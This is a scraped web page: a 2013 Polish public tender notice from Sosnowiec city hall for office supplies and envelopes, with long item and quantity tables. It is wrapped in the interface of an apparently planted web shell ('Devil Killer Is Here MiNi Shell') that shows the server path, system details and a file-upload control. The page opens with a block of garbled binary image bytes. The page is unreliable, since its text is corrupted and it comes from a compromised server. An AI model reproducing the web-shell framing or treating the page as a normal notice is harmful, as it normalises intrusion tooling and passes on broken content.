JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/63638-N-2013.html

<p class="kh_header"><b>Sosnowiec: Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A,
dostawa kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie B,
dostawa artykułów biurowych na potrzeby Referatu Gospodarki Odpadami Komunalnymi - zadanie C,
dostawa artykułów biurowych na potrzeby Referatu Spraw Wojskowych - zadanie D,dostawa materiałów papierniczych do sprzętu drukarskiego 
i urządzeń kserograficznych dla komórek organizacyjnych Urzędu Miejskiego 
w Sosnowcu - zadanie E.</b><br>
<b>Numer ogłoszenia: 63638 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A,
dostawa kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie B,
dostawa artykułów biurowych na potrzeby Referatu Gospodarki Odpadami Komunalnymi - zadanie C,
dostawa artykułów biurowych na potrzeby Referatu Spraw Wojskowych - zadanie D,dostawa materiałów papierniczych do sprzętu drukarskiego 
i urządzeń kserograficznych dla komórek organizacyjnych Urzędu Miejskiego 
w Sosnowcu - zadanie E..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 2A szczegółowy formularz oferty  dla zadania A                                                                      
Lp.Nazwa artykułu	Jednostka miary	Zamawiana liczba	1 Dostawa 
1.	Blok szkolny formatu A-4 
w kratkę, 50 kartkowy niemakulaturowy	 sztuki	300	150	150
2.Brulion w kratkę, szyty i klejony format A-4, twarda oprawa 
96 kartkowy, 
gramatura kartek 55gm2	sztuki	150	100	50	0	 
3.Brulion w kratkę, szyty i klejony format A-5, twarda oprawa 
96 kartkowy, 
gramatura kartek 55gm2	sztuki	150	100	50	0	 
4.Teczka do podpisu A-4 harmonijkowa 10 przegródek skóropodobna	sztuki	200	100	50	50	 	 
5.Teczka do podpisu 
ze skorowidzem alfabetycznym od A do Z skóropodobna	sztuki	5	5	0	0	 	 
6.Skorowidz alfabetyczny A-5 twarda oprawa (100 kartek)	sztuki	15	15	0	0	 	 
7.Skoroszyt zawieszkowy tekturowy cały (1do1) o gramaturze 300 g	sztuki	3000	2000	1000	0	 	 
8.Skoroszyt kartonowy oczkowy 
do wpinania cały 1do1 
o gramaturze 300 g	sztuki	8000	4000	2000	2000	 
9.Segregator 75 mm formatu A4 
z dźwignią z dociskaczem, oklejony na zewnątrz folią polipropylenową, wewnątrz papierem, na dolnych krawędziach metalowe okucia 
z wymienną obustronną etykietą 	sztuki	2000	1000	500	50
 
10.Segregator 50 mm typu A4 
z dźwignią z dociskaczem, oklejony na zewnątrz folią polipropylenową, wewnątrz papierem, na dolnych krawędziach metalowe okucia 
z wymienną obustronną etykietą	sztuki	500	150	200	150	 	 
11.Teczki wiązane tekturowe białe o gramaturze 300 g	sztuki	10 000	5 000	2 500	2 500	 	 
12.Teczki wiązane tekturowe białeo gramaturze 250 g	sztuki	24 000	20 000	2 000	2 000	 	 
13.Pudła archiwizacyjne 
do przechowywania dokumentów o wymiarze szerokości grzbietu 100 mm, tekturowe	sztuki	2500	1000	500	1000	 	 
14.	Teczka z gumką biała 
o gramaturze 300g	sztuki	600	200	200	200                                                                                                 15.	Teczka skrzydłowa z rzepem formatu A4 o wymiarach 248x319x35mm	sztuki	30	10	10	10	 	 
16.	Gumka ołówkowa przeznaczona do stosowania na papierze, dokładnie wycierająca ołówek, nienaruszająca struktury papieru o wymiarach około 43 mm x 17mm x 12 mm	sztuki	200	100	50	50	 	 
17.	Sznurek, dratwa nabłyszczana, kolor brązowy, wytrzymałość 17,5 kg, o wadze 10 dkg	sztuki	60	20	20	20	 	 
18.	Taśma klejąca dwustronna o szerokości 50 mm x 25m, pokryta obustronnie klejem akrylowym	sztuki	5	5	0	0
19.Temperówka metalowa	sztuki	100	50	50	0	  
20.Tusz do stempli, wodny, uniwersalny fiolet 22ml,	sztuki	130	70	30	30	 	 
21.Tusz do stempli, wodny, uniwersalny czarny 22 ml	sztuki	100	50	20	30	 	 
22.Tusz do stempli, wodny, uniwersalny czerwony 22 ml	sztuki	100	30	30	40	 	 
23.Dziurkacz z metalową podstawą 
i wykończeniem z tworzywa sztucznego typu Eagle 837 lub równoważny z ogranicznikiem formatu, na 2 dziurki, 
z możliwością dziurkowania 
co najmniej 15 kartek	sztuki	70	20	30	20	 	 
24.Dziurkacz z metalową podstawą 
i wykończeniem z tworzywa sztucznego z ogranicznikiem formatu, na 2 dziurki, 
z możliwością dziurkowania 
co najmniej 40 kartek	 sztuki	30	10	10	10	 	 
25.Zszywacz metalowy, wyposażony w obrotowy mechanizm typu Eagle 204 
lub równoważny, zszywający 
do 12 kartek	 sztuki	130	50	50	30	 	 
26.Zszywacz o dużej wytrzymałości, metalowy mechanizm, plastikowe ramię, zszywający na płasko typu SAX 539 lub równoważny, zszywający do 30 kartek	 sztuki	30	15	15	0	 	 
27.Rozszywacz, uniwersalny, metalowy z plastikową obudową	sztuki	80	40	20	20	 	 
 
28.Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 24przez6 
(1000 sztuk w opakowaniu)	opakowanie	1000	300	400	300	 	 
29.Długopis automatyczny 
na wkłady z końcówką zapewniającą lekkość i płynność pisania, przezroczysta obudowa pozwala na kontrolę tuszu (niebieski), gumowy uchwyt 
i klips w kolorze tuszu, grubość linii pisania około 0,27mm, długość linii pisania około 6000m	sztuki	300	150	150	0	 	 
30.Ołówek odporny na złamanie 
z gumką, twardość HB	sztuki	1000	500	200	300	 
31.	Długopis klasyczny 
z szybkoschnącym tuszem 
na bazie oleju, transparentny korpus, zabezpieczony wentylowaną skuwką w kolorze tuszu (niebieski), średnia końcówka około 1mm, długość linii pisania około 3000m	sztuki	1500	500	500	500	 	 
32.	Długopis automatyczny 
z wymiennym wkładem, obudowa w kolorze tuszu, wygodny gumowy uchwyt, wkład w kolorze niebieskim, długość pisania około 2000 m, trwała kulka około 1mm	sztuki	600	600	0	0	 	 
33.Wkład pasujący do długopisu 
z pozycji nr 29	sztuki	500	200	200	100	 	 
34.Wkład pasujący do długopisu 
z pozycji 32	sztuki	1600	600	500	500	 	 
35.Foliopis czarny, z cienką końcówką wodoodporny 
do pisania na folii, plastiku, szkle, metalu, średnica końcówki 
około 05mm	sztuki	100	50	50	0	 	 
36.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 04 mm (czarny)	sztuki	800	300	300	200	 	 
37.Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 04 mm czerwony	sztuki	700	300	200	200	 	 
 38.Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm zielony	sztuki	500	200	100	200	 	 
39.	Zakreślacz fluorescencyjny, nietoksyczny, o wysokiej wydajności oraz trwałości, 
nie rozmazujący, o ściętej końcówce, grubość linii pisaniaokoło1-5 mm, długość linii pisania około 170m żółty 	sztuki	300	100	100	100	 	 
40.	Zakreślacz fluorescencyjny, nietoksyczny, o wysokiej wydajności oraz trwałości, 
nie rozmazujący, o ściętej końcówce, grubość linii pisania około 1-5 mm, długość linii pisania około 170m zielony 	sztuki	300	100	100	100	 	 
41.	Zakreślacz fluorescencyjny, nietoksyczny, o wysokiej wydajności oraz trwałości, 
nie rozmazujący, o ściętej końcówce, grubość linii pisania około 1-5 mm różowy, długość linii pisania około 170m	sztuki	250	100	100	50	 	 
42.	Flamastry 4 kolorowe, odporne na wysuszanie zielony, czerwony, niebieski, czarny, plastikowa końcówka, grubość linii pisania około 0,5mm 	komplet	15	15	0	0	 	 
43.	Długopis na sprężynce, podstawka przyklejana 
do podłoża, stojący, średnica kulki około 0,7 mm, długość linii pisania do 800 m	sztuki	200	100	50	50	 	 
44.	Poduszki samotuszujące 
o wymiarach 11cm na 7 cm fioletowe	sztuki	60	20	20	20	 	 
45.	Poduszki samotuszujące 
o wymiarach 11 cm na 7 cm czerwone	sztuki	40	20	20	0	 	 
46.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 24na8 
1000 sztuk opakowanie 	opakowanie	150	100	50	0	 	 
47.	Nożyczki metalowe, długość 
21 cm z plastikowym uchwytem 	sztuki	150	50	50	50	 
 48.	Uniwersalny marker permanentny wodoodporny, przeznaczony do stosowania 
na różnych powierzchniach - czarny z okrągłą końcówką, grubość linii pisania od 1-3 mm	sztuki	400	150	150	100	 	 
49.	Uniwersalny marker permanentny wodoodporny, przeznaczony do stosowania 
na różnych powierzchniach 
 czarny ze ściętą końcówką, grubość linii pisania od 1-5 mm	sztuki	50	30	20	0	 	 
50.	Kredki o odpowiedniej twardości 
i wytrzymałości 12 kolorowe	komplet	5	5	0	0	 	 
51.	Ołówek automatyczny 
w gumowanej obudowie antypoślizgowej, z gumką chronioną skuwką, grafit 0,5mm 	sztuki	30	10	20	0	 	 
52.	Grafity do ołówków 0,5 HB 12 rysików opakowanie, pasujące do ołówków z pozycji 51	opakowanie	40	20	20	0	 	 
53.	Korektor w płynie uniwersalny, szybkoschnący z gąbeczką 
do rozprowadzania fluidu 
o pojemności 20 ml	sztuki	100	60	20	20	 	 
54.	Korektor w piórze z cienką metalową końcówką, szybkoschnący, uchwyt połączony z dozownikiem 
o pojemności do 8 ml	sztuki	100	50	20	30	 	 
55.	Korektor w taśmie, przezroczysta obudowa, szerokość taśmy około 4i2mm, poliestrowa taśma odporna na zerwanie o długości około 10 m, 	sztuki	100	50	30	20	 	 
56.	Klej biurowy w sztyfcie, nietoksyczny, bez rozpuszczalników, na bazie PVP, zmywalny za pomocą wody, 
do klejenia papieru, kartonu, zdjęć, gramatura 15 g 	sztuki	1500	500	500	500	 	 
57.	Bloczek samoprzylepny 76 na 76, karteczki w żółtym - neutralnym kolorze, ilość 100 karteczek, gramatura 70g m2	bloczek	900	500	200	200	 	 
58.	Bloczek samoprzylepny 76 x 51mm, karteczki w żółtym - neutralnym kolorze, ilość 100 karteczek, gramatura 70gm2	bloczek	800	300	200	300	 	 
 59.	Kostka klejona biała 8,3 na 8,3x na5,0cm	bloczek	400	150	150	100	 	 
60.	Ofertówka twarda A-4  bezbarwna	sztuki	2500	1000	500	1000	 	 
61.	Taśma klejąca, przeźroczysta - szerokość 24 mm, długość 20m	sztuki	300	100	100	100	 	 
62.	Koszulka na dokumenty formatu A-4 230x300 mm, PP 40um, otwierana na górze, przezroczysta, antyelektrostatyczna, pasek 
z multiperforacją 100 sztuk 
w opakowaniu	opakowanie	300	100	100	100	 	 
63.	Skoroszyt uniwersalny twardy wykonany z PCV o grubości 
150 um przód w formacie A4 
o pojemność 200 kartek, przednia okładka przezroczysta, spodnia kolorowa, dwustronnie zapisywalny pasek brzegowy	sztuki	600	200	200	200	 	 
64.	Skoroszyt wpinany twardy wykonany z PCV o grubości 150um przód w formacie A4, pojemność 200 kartek, przednia okładka przeźroczysta, spodnia kolorowa, dwustronnie zapisywalny pasek brzegowy, dziurkowanie 11	sztuki	500	200	150	150	 	 
65.	Identyfikator wyposażony w klips i agrafkę , rozmiar przystosowany do kart wizytowych około 90x57mm	sztuki	250	100	100	50	 	 
66.	Taśma klejąca przezroczysta, szerokość 18mm, długość 20 m	sztuki	250	100	100	50	 	 
67.	Taśma klejąca przezroczysta, szerokość 48mm, długość 50m 	sztuki	120	40	40	40	 	 
68.	Teczka A4 z klipsem, z dwiema sztywnymi okładkami 
i mechanizmem zaciskowym 
do papieru	sztuki	50	20	20	10	 	 
69.	Przekładka do segregatora 
z kolorowego kartonu 160 gsm, do segregowania dokumentów 
w formacie A4, multiperforowana, z kartą opisową na 10 kart	opakowanie	100	40	20	40	 	 
70.	Okładki do bindownicy przód (folia bezbarwna) (100 sztuk 
w opakowaniu) format A4	opakowanie	40	15	15	10	 	 
71.	Okładki do bindownicy tył (karton skóropodobny) format A4 kolor 
(100 sztuk w opakowaniu) 	opakowanie	40	15	15	10	 	 
72.	Grzbiety do bindownicy 8 format A4 (100 sztuk w opakowaniu)	opakowanie	10	5	5	0	 	 
73.	Grzbiety do bindownicy 10 format A4 (100 sztuk w opakowaniu)	opakowanie	10	5	5	0	 	 
74.	Grzbiety do bindownicy 12 format A4 (100 sztuk w opakowaniu)	opakowanie	10	5	5	0	 	 
75.	Grzbiety do bindownicy 14 format A4 (100 sztuk w opakowaniu)	opakowanie	5	2	3	0	 	 
76.	Grzbiety do bindownicy 16 format A4 (100 sztuk w opakowaniu)	opakowanie	2	2	0	0	 	 
77.	Grzbiety do bindownicy 18 format A4 (100 sztuk w opakowaniu)	opakowanie	2	2	0	0	 	 
78.	Grzbiety do bindownicy 32 format A4 (100 sztuk w opakowaniu)	opakowanie	1	0	0	1	 	 
79.	Grzbiety do bindownicy 45 format A4 (100 sztuk w opakowaniu)	opakowanie	1	0	0	1	 	 
80.	Grzbiety do bindownicy 51 format A4 (100 sztuk w opakowaniu)	opakowanie	1	0	0	1	 	 
81.	Grzbiety do bindownicy 25 Format A4
(100 sztuk w opakowaniu)	opakowanie	1	0	0	1	 	 
82.	Grzbiety do bindownicy 28 Format A4
(100 sztuk w opakowaniu)	opakowanie	1	0	0	1	 	 
83.	Spinacze biurowe okrągłe, metalowe pokryte kolorowym plastikiem, wielkość 28 mm, 
(100 sztuk w opakowaniu)	opakowanie	1200	200	500	500	 	 
84.	Spinacze metalowe, okrągłe pokryte kolorowym plastikiem, wielkość 50 mm 
(100 sztuk w opakowaniu)	opakowanie	400	150	150	100	 	 
85.	Blok do tablicy typu Flipchart lub równoważny, wymiar 65 x100 cm (pakowane po 20 kartek)	opakowanie	6	3	0	3	 	 
86.	Teczki skóropodobne do podpisu z numeratorem po boku, formatu A4 (1-31)	sztuki	7	5	2	0	 	 
87.	Komplet 4 markerów suchościeralnych ze ścierakiem, tusz na bazie alkoholu, końcówka okrągła 276	zestaw	7	3	2	2	 	 
88.	Tablica korkowa 90 cm szer. 
x 60 cm wys. wraz z kompletem pinezek	zestaw	5	2	3	0	 	 
 89.	Tablica korkowa 80 cm szer. 
x 50 cm wys. wraz z kompletem pinezek	zestaw	5	2	3	0	 	 
90.	Tablica korkowa wraz 
z kompletem pinezek
100 cm szer. x 60 cm wys.	zestaw	5	3	0	2	 	 
91.Linijka przezroczysta plastikowa dł. 30 cm	sztuki	50	20	20	10	 	 
92.	Taśma typu Dalton do maszynek do liczenia, szerokość taśmy około 57 mm, długość 30m	sztuki	350	200	100	50	 	 
93.	Tusz do stempli metalowych 
w kolorze fioletowym	sztuki	15	10	5	0	 	 
94.	Koszulka z klapką z boku 
na dokumenty PP, przezroczysta w formacie A4, wzmocniony brzeg, pasek 
z multiperforacją 
(opakowanie 25 sztuk)	opakowanie	10	4	4	2	 	 
95.	Szuflada na biurko standard, 
na dokumenty w formacie A4 przezroczysta o wymiarach zewn. około 364x 254x 60mm, 	sztuki	100	50	50	0	 	 
96.	Spinacze biurowe krzyżowe, metalowe o wymiarach 70mm (opakowanie 12 sztuk)	opakowanie	50	20	10	20	 	 
97.	Teczka transparentna, pokryta folią, grzbiet o szerokości około 
6 cm, wyposażone 
w mechanizm zamykający	sztuki	20	20	0	0	 	 
98.	Mechanizm skoroszytowy wąsy do teczek (25 szt. 
w opakowaniu, 10 opakowań 
w pudle), kolorowe	pudła	20	10	5	5	 	 
99.	Teczki na akta osobowe okładka z PCV, wewnątrz 
z przekładkami	sztuki	100	50	50	0	 	 
100.	Przybornik na biurko 
z sześcioma przegrodami 
na artykuły biurowe, wykonany 
z przezroczystego tworzywa sztucznego, odpornego 
na pęknięcia 	sztuki	50	30	20	0	 	 
101.	Marker do opisywania płyt CDDVD, szybko schnący, 
z dwiema końcówkami o różnych grubościach około 0,4mm i około 0,9mm po obu stronach markera, kolor tuszu czarny	sztuki	150	50	50	50  
 102.	Dziennik korespondencyjny 
96 kartkowy, okładka tekturowa oklejona tworzywem skóropodobnym, format A4	sztuki	100	50	50	0	 	 
103.	Zakładki indeksujące kolor neon, wielorazowe, z możliwością zapisu, ilość fiszek 5x 25 sztuk, wykonane z PP o grubości około 60um, wymiary (12x45mm)	opakowanie	5	0	0	5	 	 
104.	Rolka barwiąca czerwono-czarna do Citizena GR745/IR40T	sztuki	80	40	20	20	 	 
105.	Maczałka 	sztuki	25	15	10	0	 	 
106.	Zeszyt A5, 32 kartkowy w kratkę	sztuki	15	10	5	0	 	 
107.	Nóż do kopert	sztuki	15	10	5	0	 	 
108.	Długopis żelowy, z wymiennym wkładem w kolorze niebieskim lub czarnym, przezroczysta obudowa, tusz wodoodporny 
i nieblaknący, średnica kulki 0,5mm, długość linii pisania 
do 400m, gumowy uchwyt gwarantujący komfort pisania	sztuki	150	50	50	50	 	 
109.	Wkład pasujący do długopisu żelowego z pozycji 108	sztuki	150	50	50	50	 	 
110.	Zszywki specjalistyczne 
o wysokiej jakości do zszywaczy o dużej wytrzymałości 23/10 
(100 sztuk w opakowaniu)	sztuki	5	2	2	1	 	 
111.	linijka plastikowa, przezroczysta o dł. 20 cm	sztuki	50	30	20	0	 	 
112.	Folia laminacyjna, zaokrąglone rogi, błyszcząca formatu A4, 
80 mic (opakowanie 100 sztuk)	opakowanie	20	10	10	0	 	 
113.	Folia laminacyjna, zaokrąglone rogi, błyszcząca formatu A5, 80 mic (opakowanie 100 sztuk)	opakowanie	3	3	0	0
Załącznik nr 2B - szczegółowy formularz oferty - dla zadania B  	                      Lp.	NAZWA ARTYKUŁU	Jednostka miary	Zamawiana liczba	1 Dostawa 
7 dni po podpisaniu umowy	 2 Dostawa
17.06.2013	3 Dostawa
21.10.2013	
Cena jednostkowa
 brutto	Wartość całej pozycji brutto zamawianej liczby
1	2	3	4	5	6	7	8	9
1.	Koperty białe 
z nadrukiem linii 
na dane teleadresowe samoklejące C-6	opakowanie (1000szt.)	70	40	20	10		
2.	Koperty średnie, szare, z klejem B-5	opakowanie (500szt.)	45	20	15	10		
3.	Koperty średnie, białe z klejem B-5	opakowanie (500szt.)	30	10	10	10		
4.	Koperty białe z klejem C-4	opakowanie (250szt.)	40	20	10	10		
5.	Koperty białe 
bez nadruku, samoprzylepne C-6	opakowanie (1000szt.)	100	40	30	30		
6.	Koperty rozszerzane 390mm x 255mm, białe	sztuki	500	200	200	100		
7.	Koperty rozszerzane 458mm x 300mm	sztuki	300	150	100	50		
8.	Koperty powietrzne 
F-16 (A-4)	sztuki	100	50	25	25		
9.	Koperty szare 
z klejem C-4 	opakowanie (250szt.)	60	20	20	20		
10.	Koperty białe DL 
bez okienka	opakowanie (1000szt.)	12	5	5	2		
11.	Koperta z okienkiem DL	opakowanie (1000szt.)	70	30	20	20		
12.	Koperta B-12 powietrzna	sztuki	50	20	20	10		
Załącznik nr 2 C - szczegółowy formularz oferty - dla zadania C  	                     1.	Blok szkolny formatu A-4 w kratkę, 50 kartkowy niemakulaturowy	 sztuki	50	 	 
2.	Brulion w kratkę, szyty i klejony format A-5, twarda oprawa 96 kartkowy, gramatura kartek 55gm2	sztuki	5	 	 
3.	Teczka do podpisu A-4 harmonijkowa (10 przegródek) skóropodobna	sztuki	10	 	 
4.	Skoroszyt kartonowy oczkowy do wpinania cały (1do1) 
o gramaturze 250 g	sztuki	15000	 	 
5.	Segregator 75 mm formatu A4 z dźwignią z dociskaczem, oklejony na zewnątrz folią polipropylenową, wewnątrz papierem, na dolnych krawędziach metalowe okucia z wymienną obustronną etykietą 	sztuki	1000	 	 
6.	Teczki wiązane tekturowe (białe) o gramaturze 250 g	sztuki	250	 	 
7.	Teczka z gumką, wykonana z mocnego lakierowanego 
i barwionego kartonu o gramaturze 400g/m2 w formacie A4, 	sztuki	10	 	 
8.	Gumka ołówkowa przeznaczona do stosowania na papierze, dokładnie wycierająca ołówek, nienaruszająca struktury papieru o wymiarach około 43 mm x 17mm x 12 mm	sztuki	10	 	 
9.	Temperówka metalowa	sztuki	10	 	 
10.	Tusz do stempli, wodny, uniwersalny (fiolet) 22ml,	sztuki	30	 	 
11.	Dziurkacz z metalową podstawą i wykończeniem z tworzywa sztucznego typu Eagle 837 lub równoważny z ogranicznikiem formatu, na 2 dziurki, z możliwością dziurkowania 15 kartek	sztuki	8	 	 
12.	Dziurkacz duży i mocny z metalową obudową i podstawą, gumowa rękojeść, ogranicznik formatu, na 2 dziurki, 
z możliwością dziurkowania 65 kartek typu Sax 608 
lub równoważny	sztuki	2	 	 
13.	Zszywacz metalowy, wyposażony w obrotowy mechanizm typu Eagle 204 lub równoważny, zszywający do 12 kartek	sztuki	10	 	 
14.	Zszywacz o dużej wytrzymałości, metalowy mechanizm, plastikowe ramię, zszywający na płasko typu SAX 539 
lub równoważny, zszywający do 30 kartek	sztuki	2	 	 
15.	Rozszywacz, uniwersalny, metalowy z plastikową obudową	sztuki	10	 	 
16.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 246 (1000 sztuk w opakowaniu)	opakowanie	40	 
17.	Długopis automatyczny typu ZENITH 7 lub równoważny 
z wymiennym wkładem, obudowa wykonana z wytrzymałego i estetycznego tworzywa sztucznego, wkład w kolorze niebieskim, długość pisania min. 2500m, grubość linii: około 0,7 mm 	sztuki	40	 	 
18.	Ołówek odporny na złamanie z gumką, twardość HB	sztuki	100	 	 
19.	Długopis automatyczny z wymiennym wkładem, obudowa 
w kolorze tuszu, wygodny gumowy uchwyt, wkład w kolorze niebieskim, długość pisania około 2000 m, 
trwała kulka około 1mm	sztuki	250	 	 
20.	Wkład pasujący do długopisu z pozycji nr 17	sztuki	80	 	 
21.	Wkład pasujący do długopisu z pozycji nr 19	sztuki	100	  

22.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (czarny)	sztuki	25	 	 
23.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (czerwony)	sztuki	50	 	 
24.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (zielony)	sztuki	25	 	 
25.	Zakreślacz fluorescencyjny, nietoksyczny, o wysokiej wydajności oraz trwałości, nie rozmazujący, o ściętej końcówce, grubość linii pisaniaokoło1-5 mm, długość linii pisania około 170m (różne kolory)	sztuki	50	 	 
26.	Długopis na sprężynce, podstawka przyklejana do podłoża, stojący, średnica kulki około 0,7 mm, długość linii pisania 
do 800 m	sztuki	10	 	 
27.	Poduszka samotuszująca o wymiarach 11cm x 7cm (fioletowa)	sztuki	2	 	 
28.	Poduszka samotuszująca o wymiarach 11cm x 7cm (czerwona)	sztuki	2	 	 
